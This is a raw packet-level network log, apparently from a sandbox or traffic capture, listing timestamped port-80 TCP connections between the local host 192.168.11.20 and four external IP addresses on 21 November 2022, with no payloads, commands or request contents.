                                                                                                                                                                                    Nov 21, 2022 19:22:14.268141985 CET8049861194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:14.268193007 CET8049861194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:14.268307924 CET4986180192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:14.268393993 CET4986180192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:15.260185957 CET4986180192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:16.276060104 CET4986280192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:16.294883966 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.295126915 CET4986280192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:16.295747995 CET4986280192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:16.295847893 CET4986280192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:16.313580990 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.313673973 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.313726902 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.313777924 CET4986280192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:16.313836098 CET4986280192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:16.313852072 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.313895941 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.313900948 CET4986280192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:16.314052105 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.314121008 CET4986280192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:16.314282894 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.314280987 CET4986280192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:16.314448118 CET4986280192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:16.314635038 CET4986280192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:16.332077026 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.332146883 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.332191944 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.332231045 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.332362890 CET4986280192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:16.332427979 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.332454920 CET4986280192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:16.332637072 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.332681894 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.332724094 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.332976103 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.350311041 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.350374937 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.350416899 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.350456953 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.350496054 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.350900888 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.350958109 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.351340055 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.351399899 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.351445913 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.351490021 CET8049862194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:16.351569891 CET4986280192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:16.351634979 CET4986280192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:17.306725025 CET4986280192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:18.322211981 CET4986380192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:18.339807987 CET8049863194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:18.340022087 CET4986380192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:18.340101004 CET4986380192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:18.357633114 CET8049863194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:18.359204054 CET8049863194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:18.359293938 CET8049863194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:18.359318018 CET8049863194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:18.359340906 CET8049863194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:18.359649897 CET4986380192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:18.359993935 CET4986380192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:18.360090971 CET4986380192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:18.377341986 CET8049863194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:23.405531883 CET4986480192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:23.422355890 CET8049864185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:23.422605991 CET4986480192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:23.422699928 CET4986480192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:23.439624071 CET8049864185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:23.439994097 CET8049864185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:23.440089941 CET8049864185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:23.440263987 CET4986480192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:24.430252075 CET4986480192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:25.445624113 CET4986580192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:25.462460041 CET8049865185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:25.462950945 CET4986580192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:25.463323116 CET4986580192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:25.480389118 CET8049865185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:25.480854988 CET8049865185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:25.480942011 CET8049865185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:25.481190920 CET4986580192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:26.476563931 CET4986580192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:27.492541075 CET4986680192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:27.509696007 CET8049866185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:27.509953976 CET4986680192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:27.510642052 CET4986680192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:27.510679960 CET4986680192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:27.510754108 CET4986680192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:27.527748108 CET8049866185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:27.527765036 CET8049866185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:27.527971029 CET8049866185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:27.527985096 CET8049866185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:27.528033018 CET4986680192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:27.528053045 CET4986680192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:27.528070927 CET8049866185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:27.528269053 CET4986680192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:27.528439999 CET4986680192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:27.544975996 CET8049866185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:27.544995070 CET8049866185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:27.545203924 CET8049866185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:27.545217037 CET4986680192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:27.545243025 CET4986680192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:27.545248032 CET8049866185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:27.545319080 CET4986680192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:27.545505047 CET4986680192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:27.545644045 CET4986680192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:27.562403917 CET8049866185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:27.562480927 CET8049866185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:27.562530041 CET8049866185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:27.562572956 CET8049866185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:27.564583063 CET8049866185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:27.564888000 CET4986680192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:28.522906065 CET4986680192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:29.538532972 CET4986780192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:29.555443048 CET8049867185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:29.555730104 CET4986780192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:29.555793047 CET4986780192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:29.572669029 CET8049867185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:29.572772980 CET8049867185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:29.572829962 CET8049867185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:29.573117018 CET4986780192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:29.573194027 CET4986780192.168.11.20185.101.158.239
                                                                                                                                                                                    Nov 21, 2022 19:22:29.590238094 CET8049867185.101.158.239192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:43.015100002 CET4986880192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:43.177673101 CET804986850.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:43.178009033 CET4986880192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:43.178184032 CET4986880192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:43.341813087 CET804986850.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:43.512882948 CET804986850.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:43.512993097 CET804986850.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513070107 CET804986850.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513151884 CET804986850.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513215065 CET804986850.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513283968 CET804986850.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513295889 CET4986880192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513348103 CET804986850.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513391018 CET4986880192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513415098 CET804986850.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513490915 CET804986850.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513545036 CET804986850.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513569117 CET4986880192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513602018 CET804986850.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513629913 CET4986880192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513804913 CET4986880192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:43.513804913 CET4986880192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:44.191385984 CET4986880192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:45.207098007 CET4986980192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:45.370068073 CET804986950.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:45.370419979 CET4986980192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:45.370502949 CET4986980192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:45.533473969 CET804986950.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:45.744667053 CET804986950.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:45.744779110 CET804986950.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:45.744854927 CET804986950.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:45.744926929 CET804986950.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:45.744990110 CET804986950.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:45.745013952 CET4986980192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:45.745064974 CET804986950.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:45.745130062 CET804986950.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:45.745192051 CET804986950.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:45.745263100 CET804986950.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:45.745268106 CET4986980192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:45.745268106 CET4986980192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:45.745320082 CET804986950.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:45.745377064 CET804986950.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:45.745477915 CET4986980192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:45.745568037 CET4986980192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:46.378427982 CET4986980192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:47.394020081 CET4987080192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:47.555174112 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.555396080 CET4987080192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:47.555999994 CET4987080192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:47.556061983 CET4987080192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:47.717585087 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.717679024 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.717734098 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.717792988 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.717827082 CET4987080192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:47.717849016 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.717905998 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.717959881 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.718014956 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.718014002 CET4987080192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:47.718214989 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.718215942 CET4987080192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:47.718276024 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.718328953 CET4987080192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:47.718545914 CET4987080192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:47.879312038 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.879607916 CET4987080192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:47.879729986 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.879800081 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.879846096 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.879893064 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.879957914 CET4987080192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:47.880059004 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.880105972 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.880129099 CET4987080192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:47.880151987 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.880198002 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.880258083 CET4987080192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:47.880467892 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.880522966 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.880567074 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:47.880613089 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.041672945 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.041748047 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.041985989 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.042054892 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.042100906 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.042360067 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.192204952 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.192226887 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.192244053 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.192260027 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.192276955 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.192333937 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.192349911 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.192364931 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.192379951 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.192393064 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.192406893 CET804987050.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:48.192500114 CET4987080192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:48.192629099 CET4987080192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:48.565336943 CET4987080192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:49.581193924 CET4987180192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:49.743707895 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:49.743947029 CET4987180192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:49.744021893 CET4987180192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:49.906383038 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.061022043 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.061095953 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.061151028 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.061203957 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.061291933 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.061353922 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.061398983 CET4987180192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:50.061399937 CET4987180192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:50.061407089 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.061460972 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.061534882 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.061570883 CET4987180192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:50.061598063 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.061914921 CET4987180192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:50.061914921 CET4987180192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:50.224834919 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.224869013 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.224908113 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.224931955 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.224991083 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225043058 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225064993 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225085974 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225106955 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225125074 CET4987180192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225142956 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225163937 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225184917 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225205898 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225227118 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225246906 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225312948 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225333929 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225353956 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225390911 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225411892 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225495100 CET4987180192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:50.225668907 CET4987180192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:50.387132883 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.387151003 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.387267113 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.387281895 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.387312889 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.387330055 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.387341976 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.387351990 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:50.387532949 CET4987180192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:50.387700081 CET4987180192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:50.387845993 CET4987180192.168.11.2050.87.192.144
                                                                                                                                                                                    Nov 21, 2022 19:22:50.550295115 CET804987150.87.192.144192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:55.545722961 CET4987280192.168.11.20195.24.68.23
                                                                                                                                                                                    Nov 21, 2022 19:22:55.588068962 CET8049872195.24.68.23192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:55.588407993 CET4987280192.168.11.20195.24.68.23
                                                                                                                                                                                    Nov 21, 2022 19:22:55.588579893 CET4987280192.168.11.20195.24.68.23
                                                                                                                                                                                    Nov 21, 2022 19:22:55.630935907 CET8049872195.24.68.23192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633491993 CET8049872195.24.68.23192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633565903 CET8049872195.24.68.23192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633621931 CET8049872195.24.68.23192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633675098 CET8049872195.24.68.23192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633728027 CET8049872195.24.68.23192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633780956 CET8049872195.24.68.23192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:55.633831978 CET8049872195.24.68.23192.168.11.20
